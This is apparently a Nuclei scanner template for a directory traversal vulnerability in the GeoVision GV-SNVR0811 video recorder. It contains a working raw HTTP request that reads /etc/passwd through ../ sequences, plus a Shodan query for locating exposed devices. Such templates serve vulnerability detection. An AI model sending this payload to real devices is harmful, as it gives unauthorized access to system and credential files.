The GeoVision GV-SNVR0811 network video recorder is vulnerable to a Directory Traversal vulnerability, which allows unauthenticated remote attackers to access arbitrary files on the device by manipulating the file path in HTTP requests (e.g., using ../ sequences).
PoC代码[已公开]
id: geovision-lfi
info:
name: GeoVision GV-SNVR0811 - Directory Traversal
author: DhiyaneshDK
severity: high
description: |
The GeoVision GV-SNVR0811 network video recorder is vulnerable to a Directory Traversal vulnerability, which allows unauthenticated remote attackers to access arbitrary files on the device by manipulating the file path in HTTP requests (e.g., using ../ sequences).
impact: This could lead to unauthorized access to sensitive files, including system configurations, credentials, or other critical information.
reference:
- https://www.exploit-db.com/exploits/45065
metadata:
verified: true
max-request: 1
shodan-query: "Server:Cross Web Server"
tags: geovision,lfi,cross-web,webclient,iot,vuln
http:
- raw:
- |
GET /../../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "root:$")'
- 'contains(content_type, "application/octet-stream")'
condition: and
# digest: 4a0a00473045022100fe4d53dfc652e7f43e3ae18033b163958edf7c7850d6e73c0322ac6d7e6f6fa002201209c5ee03b0d9c385abc4fd63dec13cf3c2e56ef3d439c7d0419baa3efbc304:922c64590222798bb761d5b6d8e72950